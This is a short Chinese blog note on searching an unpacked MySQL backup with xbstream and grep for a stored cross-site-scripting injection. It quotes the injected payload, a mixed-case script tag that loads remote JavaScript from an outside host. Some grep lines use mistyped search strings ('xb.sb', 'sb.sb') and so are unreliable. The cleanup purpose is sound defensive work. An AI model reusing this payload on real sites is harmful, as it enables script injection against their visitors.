xss腳本數據庫排查

原因

用戶提交惡意腳本,例如<sCrIpt srC=//xs.sb/xF2l></sCRipT>。需要排查數據庫中所有字段是否含字符串:xs.sb

做法

# 1. 下載rds上備份到本地linux機器,例如xxx_qp.xb文件,本人50G左右
# 2. 解壓到當前目錄
cat xxx_qp.xb | xbstream -x -v -C ./
# 分析每個文件含有惡意字符串的行,去掉參數-a可以只檢查是否存在
grep -arn "xb.sb" backup-my.cnf.qp ibdata1.qp rds_table_info_json_40212.log
grep -arn "xb.sb" xt*
grep -arn "sb.sb" mysql
grep -arn 'xs.sb' performance_schema/
grep -arn 'xs.sb' report/
grep -arn 'xs.sb' sonar/
grep -arn 'xs.sb' sys/
grep -arn 'xs.sb' ycb_old/
grep -arn 'xs.sb' ycb_fund/
grep -arn 'xs.sb' youbei_web/ > xs_sb_youbei_web.txt
grep -arn 'xs.sb' ycb/ > xs_sb_ycb.txt
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章